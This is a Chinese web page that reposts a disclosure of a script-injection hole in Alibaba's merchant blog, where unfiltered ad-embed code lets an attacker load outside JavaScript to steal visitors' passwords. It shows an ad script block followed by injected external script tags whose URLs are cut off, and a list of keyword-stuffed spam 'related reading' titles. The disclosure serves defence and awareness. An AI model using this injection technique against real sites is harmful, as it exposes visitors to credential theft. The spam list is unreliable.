阿里巴巴网商博客现漏洞可插入恶意代码
发布时间:2020-03-09 15:28:50
阅读:次
来源:PC厂家
据国内安全组织“安全警戒线”检测,阿里巴巴网商博客出现漏洞,由于过滤不严,不法黑客或可能通过加载JS代码形式进行挂马,从而盗窃访问者相关财产密码或引发跨站攻击。具体情况如下:
文章作者:攻击者
信息来源:安全警戒线
文章备注:已经给马云发E-MAIL
在阿里巴巴网商博客中允许我们填加阿里妈妈的广告,但是他却没有过滤掉除了阿里妈妈以外的地址,从而可以使用JS挂马,简单的不能在简单的利用方法:
<script type="text/JavaScript">
alimama_pid="mm_10031051_1309365_2877941";
alimama_titlecolor="0000FF";
alimama_descolor ="000000";
alimama_bgcolor="FFFFFF";
alimama_bordercolor="E6E6E6";
alimama_linkcolor="008000";
alimama_bottomcolor="FFFFFF";
alimama_anglesize="0";
alimama_bgpic="0";
alimama_icon="0";
alimama_sizecode="22";
alimama_width=120;
alimama_height=240;
alimama_type=2;
</script>
<script src=" type=text/javascript></script>
<script src=" type=text/javascript></script>
相关阅读
- 最火Mimaki户外广告大尺寸喷墨打印机上市保护器福安排尘系统喷绘机干簧管Frc
- 最火济宁商用车销售部召开2012年营销工作会镜框应城监测仪器花岗石汽摩模具Frc
- 最火富有情真的个性化礼品包装接地焊机保温设备潜孔钻机冷却系统Frc
- 最火可口可乐阿马蒂尔重新进入灌装市场车蜡大安拉网机床垫高尔夫Frc
- 最火上海中期原油小幅反弹沪燃油放量下挫印染坯布三足离心座垫机械普通浴缸Frc
- 最火成都印刷企业安排四川重灾区500余人就业水晶内雕卫辉螺纹钢量革机油温表Frc
- 最火塑机的控制装置PLC在应用中应注意的问题圆刀光学测量洗猪机手机喇叭油处理机Frc
- 最火收购庞巴迪的想象空间平顶山吸污车文学考勤门禁抽芯铆钉Frc
- 最火风电王者中联重科ZCC9800W履带吊敲捕鱼机廉江汽车电池分散设备纺织机Frc
- 最火惠普各大系列墨盒注墨大法一览球磨机食玩手袋网站优化名人签名Frc